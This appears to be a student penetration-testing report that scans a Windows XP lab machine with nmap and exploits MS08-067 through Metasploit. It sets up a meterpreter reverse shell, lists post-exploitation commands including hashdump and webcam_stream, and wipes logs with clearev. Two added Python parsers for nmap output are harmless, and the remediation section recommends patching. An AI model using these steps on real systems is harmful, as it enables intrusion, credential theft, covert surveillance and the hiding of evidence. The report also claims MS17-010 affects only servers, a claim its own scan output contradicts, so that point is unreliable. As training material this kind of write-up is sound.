Vulnerability Assessment & Penetration Testing Report | ICSS Student – Vivek Kumar

Vulnerability Assessment & Penetration Testing Report [on Windows XP]

Vulnerability is a cyber-security term that refers to a flaw in a system that can leave it open to attack. A vulnerability may also refer to any type of weakness in a computer system itself, in a set of procedures, or in anything that leaves information security exposed to a threat.

This Vulnerability Assessment & Penetration Testing Report was done by ICSS student Vivek Kumar. The full project is discussed below:


Project Name: Vulnerability Assessment & Penetration Testing

Author Name: Vivek Kumar

Publish Date: 24-07-2018


Table of Contents



Vulnerability Scanning

Attack and Penetration


Solution & Recommendation





The first part of VAPT is information gathering about the target network or machine. In our case the target is a Windows XP/2003 machine which is on the same network as us.

So first we will run an nmap scan to find the live hosts.




Now we need to separate out the live IP addresses, so we will save the above result in a text file and then filter out the IP addresses using the commands:

```
nmap -sV -sP > host.txt
cat host.txt | grep "for" | cut -d " " -f5 > ip.txt
```

The output is:




Now we have to check which one of them is the Windows XP machine, so we will run an nmap OS-detection scan (the -O option) against all the live IPs:

```
nmap -sV -O -iL ip.txt > os.txt
```

and the output is:


```
Starting Nmap 7.70 ( ) at 2018-07-16 23:55 IST
Nmap scan report for XiaoQiang (
Host is up (0.0013s latency).
Not shown: 995 closed ports
53/tcp   open  domain  dnsmasq 2.71
80/tcp   open  http    nginx (bad gateway)
8192/tcp open  http    Tengine httpd
8193/tcp open  http    nginx
8899/tcp open  http    Tengine httpd
MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=7/16%OT=53%CT=1%CU=40355%PV=Y%DS=1%DC=D%G=Y%M=7811DC%T
OS:M=5B4CE349%P=i686-pc-linux-gnu)SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%II=I%TS=7)
OS:OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4
OS:ST11NW7%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)
OS:ECN(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=A%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK
OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop

Nmap scan report for
Host is up (0.041s latency).
Not shown: 999 closed ports
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
MAC Address: F2:03:71:B7:A4:27 (Unknown)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.12 - 4.10
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for
Host is up (0.017s latency).
All 1000 scanned ports on are closed
MAC Address: 64:CC:2E:96:75:69 (Xiaomi Communications)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

Nmap scan report for
Host is up (0.042s latency).
Not shown: 996 closed ports
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
MAC Address: F2:03:71:B7:A4:27 (Unknown)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 5 IP addresses (4 hosts up) scanned in 60.99 seconds
```


The host marked in yellow in the original report, the one reported as Microsoft Windows XP|2003 with ports 139 and 445 open, is our target machine.




Now with our target locked we will move to the next step.
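The grep/cut pipeline used above to build ip.txt takes the fifth space-separated field, which is the hostname rather than the IP address whenever nmap resolves a name (as it did for the XiaoQiang host in this scan). As an added example that is not part of the original report, here is a small Python parser that takes the IP from either form of the report line and only keeps hosts nmap says are up; the sample output and its IP addresses are constructed.

```python
import re
from typing import List

# Constructed sample in the layout nmap prints. The hostname and MAC mirror
# the scan in this report; the IP addresses are made up for the example.
SAMPLE_HOST_TXT = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-16 23:50 IST
Nmap scan report for XiaoQiang (192.168.31.1)
Host is up (0.0013s latency).
MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)
Nmap scan report for 192.168.31.105
Host is up (0.041s latency).
Nmap scan report for 192.168.31.117
Host is up (0.042s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.51 seconds
"""

# Matches both "Nmap scan report for <ip>" and
# "Nmap scan report for <hostname> (<ip>)".
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \((?P<ip_paren>[^)]+)\)|(?P<ip>\S+))$"
)


def live_hosts(nmap_text: str) -> List[str]:
    """Return the IP of every host that nmap reported as up, in scan order."""
    ips: List[str] = []
    pending = None  # IP from the last report line, until "Host is up" confirms it
    for line in nmap_text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            pending = m.group("ip_paren") or m.group("ip")
        elif pending and line.startswith("Host is up"):
            ips.append(pending)
            pending = None
    return ips


def cut_field5(nmap_text: str) -> List[str]:
    """Reproduce the report's grep "for" | cut -d " " -f5 pipeline for comparison."""
    out = []
    for line in nmap_text.splitlines():
        if "for" in line:
            fields = line.split(" ")
            out.append(fields[4] if len(fields) >= 5 else "")
    return out
```

Running both on the sample shows the difference: cut_field5 returns the name "XiaoQiang" for the first host, while live_hosts returns its IP.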


Vulnerability Scanning


In this part we will scan the target for known vulnerabilities, so again we will use nmap, this time running its vuln script category, which detects known vulnerabilities in the system:

```
nmap -Pn --script vuln > vuln.txt
```

The output is:


```
Starting Nmap 7.60 ( ) at 2018-07-16 14:12 IST
Nmap scan report for
Host is up (0.0022s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2869/tcp open  icslap

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|            The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|            Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|            code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|         servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       guidance-for-wannacrypt-attacks/
|_
Nmap done: 1 IP address (1 host up) scanned in 17.10 seconds
```



The above result shows the list of vulnerabilities (marked in yellow in the original report), which are as follows:


|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED


This vulnerability exists, but it does not provide any user access, so it cannot be used. The next one is


smb-vuln-ms08-067: This vulnerability allows a user to gain remote access to the target system, and it exists on the Windows XP/2003 machine that is our target.

Then the last one listed is smb-vuln-ms17-010:


This vulnerability also allows users to gain remote access to the target system, but it is not available for the Windows XP/2003 machine; it only exists on Windows servers.
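To turn the `--script vuln` output above into a finding list that can go straight into the report, here is an added Python example (not part of the original report) that groups the host script results by script, records the state, CVE IDs and risk factor, and keeps an error verdict such as NT_STATUS_ACCESS_DENIED distinct from a clean negative; the sample text is a constructed excerpt in nmap's layout using the names and values from this scan.

```python
import re
from typing import Dict, List

# Constructed excerpt in the layout of the "Host script results" section that
# `nmap --script vuln` prints; script names, states, CVE IDs and risk factor are
# those from the scan in this report.
SAMPLE_VULN_TXT = """\
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_    Disclosure date: 2008-10-23
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    Disclosure date: 2017-03-14
"""

# A script header is "| name:" or "|_name: <one-line verdict>"; the indented
# lines that follow belong to that script until the next header.
SCRIPT_RE = re.compile(r"^\|_?\s?([a-z0-9-]+):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_vuln_output(text: str) -> List[Dict]:
    """Group NSE vuln output by script, recording state, CVE IDs and risk factor."""
    findings: List[Dict] = []
    current = None
    for line in text.splitlines():
        m = SCRIPT_RE.match(line)
        if m:
            name, verdict = m.groups()
            # "false" is a clean negative; an error string (ERROR, NT_STATUS_*)
            # means the script could not finish its check, which is not "safe".
            state = "NOT VULNERABLE" if verdict == "false" else (verdict or "UNKNOWN")
            current = {"script": name, "state": state, "cves": [], "risk": None}
            findings.append(current)
        elif current and line.startswith("|"):
            body = line.lstrip("|_ ")
            if body.startswith("State:"):
                current["state"] = body.split(":", 1)[1].strip()
            elif body.startswith("Risk factor:"):
                current["risk"] = body.split(":", 1)[1].strip()
            current["cves"].extend(CVE_RE.findall(body))
    return findings
```

Filtering the result on state == "VULNERABLE" gives exactly the two findings the text above discusses, with their CVE IDs attached.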


So now we will use the ms08_067 vulnerability to exploit the machine using Metasploit.


Attack and Penetration


To perform this attack we will use msfconsole. The Metasploit Framework has a huge collection of exploits, payloads and modules that are used by the hacking community.

It can be launched by typing msfconsole in the terminal.


Now we have to search for the ms08_067 vulnerability, so we will type:

```
search ms08_067
```

Metasploit framework


The following commands follow:

```
use exploit/windows/smb/ms08_067_netapi
show payloads
```

This will show a list of payloads which can be used to perform the attack. We are going to use the windows/meterpreter/reverse_tcp payload:


```
set payload windows/meterpreter/reverse_tcp
show options
set rhost (target ip address)
set lhost (attacker ip address)
```





The final command to execute the attack is exploit.







Once we get a meterpreter session we own the target machine. Now we can do anything we want; for example, we can escalate privileges by the command

To confirm, check the IP by typing ifconfig.




We have a lot of options, which we can list by typing help. The most common ones are:

```
getsystem
sysinfo
getuid
hashdump
webcam_stream
download
cd
ls
```



Finally, we need to clear our footprints using the command clearev.



Solution & Recommendation


This particular vulnerability was patched by Microsoft, and the fix was released a long time ago, so just perform a Windows Update and this vulnerability will be automatically patched.


One should always keep his/her system and programs updated.

This habit alone gives a lot of protection, as the latest updated software is unlikely to have any known vulnerability.


Also, Windows XP is very old, so users should upgrade to the latest OS, which is Windows 10. A good antivirus should be used and it should be updated regularly. The firewall should be kept on. Contact a professional to perform regular checks.


See the full process in the video given below:




